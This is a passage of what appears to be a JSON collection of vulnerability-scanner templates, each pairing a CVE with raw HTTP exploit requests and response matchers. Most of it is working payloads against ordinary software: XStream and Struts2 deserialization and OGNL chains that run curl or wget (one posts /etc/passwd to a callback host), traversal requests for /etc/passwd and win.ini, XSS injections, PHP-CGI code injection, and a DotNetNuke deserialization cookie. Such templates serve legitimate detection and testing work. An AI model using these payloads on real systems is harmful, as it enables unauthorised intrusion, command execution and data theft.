application/json\n\n{\"message\":\"{\\\"msg\\\":\\\"method\\\",\\\"method\\\":\\\"sendForgotPasswordEmail\\\",\\\"params\\\":[\\\"user@local.email\\\"],\\\"id\\\":\\\"3\\\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\\\":false","\"success\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26217","info":{"name":"XStream <1.4.14 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n            <contentType>text/plain</contentType>\n            <is class='java.io.SequenceInputStream'>\n              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n                <iterator class='javax.imageio.spi.FilterIterator'>\n                  <iter class='java.util.ArrayList$Itr'>\n                    <cursor>0</cursor>\n                    <lastRet>-1</lastRet>\n                    <expectedModCount>1</expectedModCount>\n                    <outer-class>\n                      <java.lang.ProcessBuilder>\n                        <command>\n                          <string>curl</string>\n                          <string>http://{{interactsh-url}}</string>\n                        </command>\n                      </java.lang.ProcessBuilder>\n                    </outer-class>\n                  </iter>\n                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>start</name>\n                  </filter>\n                  <next/>\n                </iterator>\n                <type>KEYS</type>\n              </e>\n              <in class='java.io.ByteArrayInputStream'>\n                <buf></buf>\n                <pos>0</pos>\n                <mark>0</mark>\n                <count>0</count>\n              </in>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-35984","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-7943","info":{"name":"Puppet Server/PuppetDB - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/metrics/v1/mbeans"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["trapperkeeper"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4556","info":{"name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.action"],"body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4504","info":{"name":"Joomla! RSfiles <=1.0.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-0885","info":{"name":"Jira Rainbow.Zen - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-5728","info":{"name":"phpPgAdmin <=4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","phpPgAdmin"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-6499","info":{"name":"WordPress Plugin Age Verification v0.4 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\nHost: {{Hostname}}\n\nredirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0991","info":{"name":"OpenEMR 4.1 - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1823","info":{"name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?php echo md5('CVE-2012-1823'); ?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3d638155445bffb044eec401381ad784"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1226","info":{"name":"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1835","info":{"name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-2371","info":{"name":"WP-FaceThumb 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0996","info":{"name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4940","info":{"name":"Axigen Mail Server Filename Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini","{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2012-0392","info":{"name":"Apache Struts2 S2-008 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0394","info":{"name":"Apache Struts <2.3.1.1 - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4889","info":{"name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0896","info":{"name":"Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-3153","info":{"name":"Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reports/rwservlet/showenv","{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Reports Servlet\")"]},{"type":"dsl","dsl":["!contains(body_2, \"<html\")","!contains(body_2, \"<HTML\")"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"windows_working_path","regex":[".?.?\\\\.*\\\\showenv"]},{"type":"regex","name":"linux_working_path","regex":["/.*/showenv"]}]}]},{"id":"CVE-2012-4768","info":{"name":"WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4273","info":{"name":"2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4982","info":{"name":"Forescout CounterACT 6.3.4.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/login?a=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2012-4547","info":{"name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4242","info":{"name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4032","info":{"name":"WebsitePanel before v1.2.2.1 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1\nHost: {{Hostname}}\nCookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\n\nctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-5913","info":{"name":"WordPress Integrator 1.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</sCripT><sCripT>alert(document.domain)</sCripT>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5321","info":{"name":"TikiWiki CMS Groupware v8.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-4878","info":{"name":"FlatnuX CMS - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4253","info":{"name":"MySQLDumper 1.24.4 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0981","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0901","info":{"name":"YouSayToo auto-publishing 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12542","info":{"name":"HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/v1/AccountService/Accounts"],"headers":{"Connection":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["iLO User"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18598","info":{"name":"WordPress Qards - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["console.log"]}]}]},{"id":"CVE-2017-14622","info":{"name":"WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 500","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"2kb-amazon-affiliates-store\")"],"condition":"and"}]}]},{"id":"CVE-2017-11512","info":{"name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini","{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2017-7615","info":{"name":"MantisBT <=2.30 - Arbitrary Password Reset/Admin Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=","{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11586","info":{"name":"FineCMS <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?s=member&c=login&m=index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nback=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n","GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["Refresh:(.*)url=http:\\/\\/interact\\.sh"]}]}]},{"id":"CVE-2017-5638","info":{"name":"Apache Struts 2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5982","info":{"name":"Kodi 17.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-4011","info":{"name":"McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-14651","info":{"name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Failed to add new collection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-9822","info":{"name":"DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /__ HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nCookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key=\"name1: key1\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type=\"xsd:string\">C:\\Windows\\win.ini</anyType></MethodParameters><ObjectInstance xsi:type=\"FileSystemUtils\"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]","for 16-bit app support"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2017-11165","info":{"name":"DataTaker DT80 dEX 1.50.012 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/getFile.cmd?userfile=config.xml"],"matchers-condition":"and","matchers":[{"type":"word","words":["COMMAND_SERVER","<loggerSettings>","config id=\"config"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3528","info":{"name":"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"],"matchers":[{"type":"word","part":"body","words":["noresize src=\"/\\interact.sh?configName="]}]}]},{"id":"CVE-2017-9805","info":{"name":"Apache Struts2 S2-052 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/struts2-rest-showcase/orders/3","{{BaseURL}}/orders/3"],"body":"<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"java.lang.ProcessBuilder\">\n                      <command>\n                        <string>wget</string>\n                        <string>--post-file</string>\n                        <string>/etc/passwd</string>\n              <string>{{interactsh-url}}</string>\n                      </command>\n                      <redirectErrorStream>false</redirectErrorStream>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>asdasd</name>\n                  </filter>\n                  <next class=\"string\">asdasd</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</map>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["Debugging information","com.thoughtworks.xstream.converters.collections.MapConverter"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-14535","info":{"name":"Trixbox - 2.8.0.4 OS Command Injection","severity":"high"},"requests":[{"raw":["GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\nConnection: close\nCache-Control: max-age=0\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17451","info":{"name":"WordPress Mailster <=1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14524","info":{"name":"OpenText Documentum Administrator 7.2.0180.0055 - Open 